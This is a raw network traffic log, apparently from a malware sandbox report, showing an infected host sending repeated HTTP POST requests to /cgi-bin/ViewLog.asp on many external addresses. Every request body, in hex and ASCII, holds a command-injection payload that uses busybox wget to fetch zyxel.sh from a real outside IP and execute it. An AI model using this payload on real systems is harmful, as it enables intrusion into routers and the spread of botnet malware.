                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              723192.168.2.234258295.131.78.1928080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:55.161416054 CET14267OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:55.535702944 CET14275INHTTP/1.1 403 Forbidden
                                                              Content-Type: text/html;charset=UTF-8
                                                              Content-Length: 0
                                                              Connection: close
                                                              Cache-control: no-cache


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              724192.168.2.233334885.221.211.2028080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:55.436661959 CET14271OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:55.757232904 CET14314INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:56 GMT
                                                              Server:
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              725192.168.2.235551031.136.110.568080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:55.442862988 CET14271OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:56.454298973 CET14392OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:58.437993050 CET14636OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:02.373528957 CET15147OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:10.308397055 CET16172OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:26.178337097 CET18149OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:58.430165052 CET20692OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              726192.168.2.235570431.136.154.2488080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:55.443115950 CET14272OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:56.454309940 CET14392OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:58.438009024 CET14636OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:02.629426003 CET15158OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:10.564368010 CET16176OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:26.434470892 CET18156OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:58.430210114 CET20693OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              727192.168.2.235149231.136.89.288080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:55.444714069 CET14273OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:56.454298973 CET14391OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:58.438014984 CET14637OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:02.629420996 CET15158OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:10.564374924 CET16176OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:26.434484005 CET18157OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:58.430208921 CET20693OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              728192.168.2.234290431.136.22.178080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:55.445070982 CET14273OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:56.454276085 CET14391OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:58.438009024 CET14637OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:02.629425049 CET15158OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:10.564384937 CET16177OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:26.434470892 CET18157OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:58.430210114 CET20694OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              729192.168.2.235541294.122.10.1338080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:55.506479979 CET14275OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


